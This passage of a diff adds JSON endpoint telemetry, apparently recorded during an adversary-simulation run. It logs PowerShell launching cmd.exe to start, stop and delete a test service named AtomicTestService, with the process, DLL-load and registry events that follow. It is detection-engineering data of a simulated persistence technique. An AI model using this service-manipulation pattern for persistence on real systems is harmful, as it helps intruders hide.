"registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "terminate", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "image_load", + "image_name": "sc.exe", + "image_path": "C:\\Windows\\System32\\sc.exe", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "file", + "file_name": "SC.EXE-BC6DAF49.pf", + "file_path": "C:\\Windows\\Prefetch\\SC.EXE-BC6DAF49.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 
131883570844960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "file", + "file_name": "CMD.EXE-89305D47.pf", + "file_path": "C:\\Windows\\Prefetch\\CMD.EXE-89305D47.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe start AtomicTestService\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5588, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570845090000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + 
"image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "command_line": "sc.exe start AtomicTestService", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3448, + "ppid": 5588, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "create", + "timestamp": 131883570845200000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}", + "unique_ppid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "sc.exe", + "image_path": "C:\\Windows\\System32\\sc.exe", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + 
"unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "process", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "terminate", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "process", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + 
"subtype": "terminate", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 428, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570845380000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": 
"{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "command_line": "sc.exe stop AtomicTestService", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6352, + "ppid": 428, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "create", + "timestamp": 131883570845480000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}", + "unique_ppid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "sc.exe", + "image_path": "C:\\Windows\\System32\\sc.exe", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6352, + 
"process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "process", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "terminate", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "process", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe delete AtomicTestService\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7720, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + 
"subtype": "create", + "timestamp": 131883570845660000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "command_line": "sc.exe delete AtomicTestService", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": 
"C:\\Windows\\System32\\cmd.exe", + "pid": 2472, + "ppid": 7720, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "create", + "timestamp": 131883570845760000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}", + "unique_ppid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "sc.exe", + "image_path": "C:\\Windows\\System32\\sc.exe", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": 
"rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\DeleteFlag", + "registry_value": "DeleteFlag", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", + "registry_value": "Start", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_value": "AtomicTestService", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "process", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + 
"subtype": "terminate", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "process", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3136, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570845950000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + 
"image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "process", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_value": "AtomicTestService", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Type", + "registry_value": "Type", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", + "registry_value": "Start", 
+ "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ErrorControl", + "registry_value": "ErrorControl", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath", + "registry_value": "ImagePath", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ObjectName", + "registry_value": "ObjectName", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570847300000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570847300000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": 